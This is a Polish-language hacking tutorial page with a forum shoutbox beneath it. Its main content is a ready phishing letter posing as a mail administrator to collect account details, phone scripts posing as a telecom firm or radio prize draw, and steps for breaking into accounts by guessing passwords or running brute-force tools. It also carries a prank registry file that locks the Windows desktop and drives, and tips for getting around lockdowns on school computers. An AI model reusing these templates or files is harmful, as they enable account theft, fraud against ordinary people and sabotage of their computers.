b) to co wyżej tylko plus porno i tym razem do admina skrzynki.

Chcesz poznać ip hosta wpisz w start/uruchom: ping nazwa_strony, ping ftp.nazwa_strony
PowerGG- w momencie kiedy ofiara dodaje nas do swojej listy zdobywamy jej IP
Pozyskiwanie informacji całkowicie legalnie http://www.ditel.tpsa.pl
Prosisz gościa o wysłanie maila kiedy masz go na skrzynce wybierasz właściwości/szczegóły

Całkowicie anonimowy list możemy wysłać z strony http://hyperreal.info/cypher/remailer

Najlepszą metodą na pozyskanie wszelkich informacji jest podszywanie się za kogoś kim
tak naprawdę nie jesteśmy. Przkładowo zakładamy free konto np.rootpoczta, adminpoczta
i wysyłamy liścik o treści:

Szanowni Państwo

W związku z nasilającymi próbami się włamań na nasz serwer_nazwa informujemy państwo,
że zmieniamy system kodowania haseł, albo w związku licznym zakładaniem skrzynek, które
nie są przez nikogo używane zwracamy się z gorącą prośbą o przesłanie poniższego
formularza na adres admina systemu. Poniższy formularz ma na celu zweryfikowanie, czy
istniejąca skrzynka jest używana. Brak odpowiedzi będzie świadczył, że konto nie jest
używane. Zostanie ono skasowane.

O zasadach wysyłania informujemy na stronie www.mój_bajer.pl

Dział Sieci Teleinformatycznych;
Administrator systemu: Pan_kłamca

Dzwonimy do ofiary przedstawiamy się jako TPSA lub RADIO xxx wygrał Pan/Pani nagrodę
główną jedynie trzeba potwierdzić dane...

Wysyłamy maila z informacją o wygraniu konkursu na darmowe konto www lub shell trzeba
potwierdzić dane login i passwd dla lepszego efektu wklejamy gratis loga firmy.

._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._..

Hackowanie kont

1. Zgadujemy hasło
2. Sprawdzamy pytanie pomocnicze i wysyłamy pytanie do lamy z prośbą o odpowiedź
3. Podszywamy się pod admina lub tspa i grzecznie prosimy o login i hasło
4. Uruchamiamy programy BrutusA2 lub WWWhack

._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._

DOS

dysk: (dysk a,c,d,itd) komenda wybiera partycje lub dysk
cd katalog (nazwa katalogu) wchodzimy w dany katalog
cd.. wychodzi z danego katalogu
dir wyświetla pliki i katalogi bieżącego dysku lub katalogu
dir /p dzieli wyniki wyświetlane w proporcjach
dir /w dzieli wynik na kilka kolumn
dir /s pokazuje pliki i foldery ze wszystkich podfolderów
md "nazwa" (nazwa katalogu) tworzy katalog
rd "nazwa" (nazwa katalogu) usuwa katalog
del *.* kasuje wszystkie pliki w katalogu w obecnym katalogu
cls czyści ekran
ren "nazwa" zmienia nazwę pliku lub katalogu
copy "skąd" "dokąd" kopiowanie podajemy co skąd i dokąd
attrib pokazuje atrybuty plików w katalogu bieżącym
attrib +r (nazwa i miejsce) nadaje atrybut Tylko-Do-Odczytu plikowi
attrib +s (-|-) nadaje atrybut Pliku Systemowego plikowi
attrib +a (-|-) nadaje atrybut Pliku Archiwalnego plikowi
deltree c:\nazwa katalogu usuwa katalog o nazwie oraz pliki znajdujące się w nim
deltree c:\nazwa "/s" to samo tylko musisz potwierdzić
format "dysk": formatowanie
fdisk program do dzielenia dysku na partycje
edit edytor tekstu
tree \ graficzny wykaz drzewa katalogowego twojego dysku
tree C:\ /f | more" drzewo będzie pokazywał ekran po ekranie
type "ścieżka\plik" pokazuje plik bez możliwości jego modyfikacji
edit "ścieżka\plik" otwiera plik w edytorze

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion]
"RegisteredOwner"="Cow & Chicken"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion]
"ProductId"="AmAziNg FuCkinG"

[HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0]
"VendorIdentifier"="D.e.a.d.l.a.m.e.r.s"

[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSetFolders"=dword:00000001
"NoDrives"=dword:03ffffff
"NoClose"=dword:00000001
"NoDesktop"=dword:00000001

[HKEY_USERS\.Default\Control Panel\Mouse]
"SwapMouseButtons"="1"

[HKEY_LOCAL_MACHINE\Config\0001\Display\Settings]
"BitsPerPixel"="16"
"Resolution"="400,300"


Tworzenie kluczy blokujących i odblokowujących np.

"NoClose"=dword:00000001 <-blokuje dostęp
"NoClose"=dword:00000000 <-odblokowuje dostęp

Znoszenie ograniczeń

a) W szkole lub kawiarenkach mamy zwykle poblokowany dostęp do partycji wystarczy utworzyć
skrót o lokalizacji "c:\" lub "file:\\"
b) Na różnych targach możemy również spotkach strzępki systemu programy rodziny WORD lub
WORKS. Wybieramy WSTAW-> OBIEKT-> PAKIETY odpala się pakowarka i mamy WIERSZ POLECEŃ...

Odbezpieczanie rejestru tworzymy klucz

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

Jeśli chcesz wstawić sobie informacje do zakładki właściwości systemu musisz stworzyć dwa
pliki i zapisać je w c:\windows\system (win98)

Plik oemlogo.bmp
Bitmapa 180x120 pixli (8/16/32 bit). Kolor nr 13 w palecie jest przeźroczysty.

Plik oeminfo.ini :

[general]
Manufacturer=Produc
Logowanie
Nazwa użytkownika

Hasło



Nie masz jeszcze konta?
Zarejestruj się

Nie możesz się zalogować?
Poproś o nowe hasło
Shoutbox
Musisz zalogować się, aby móc dodać wiadomość.

12-09-2014 21:21
Hello world ! XD

18-08-2014 22:46
To jest ok działanie kiedy to każdy client czeka na jakiś sygnał od serwera zamiast odwrotnie? Troche jak 1 client i 10000 serwerów Sad

10-08-2014 11:29
Szukam ksiazki z arch komputerowej, polecicie? Smile

01-08-2014 22:39
pozro dawno mie tu nie było chyba z 6 lat Lol

14-07-2014 15:20
Dobra, nie innego php, tylko innego php.ini. mam już. Grin

Licznik
23,265,865 unikalne wizyty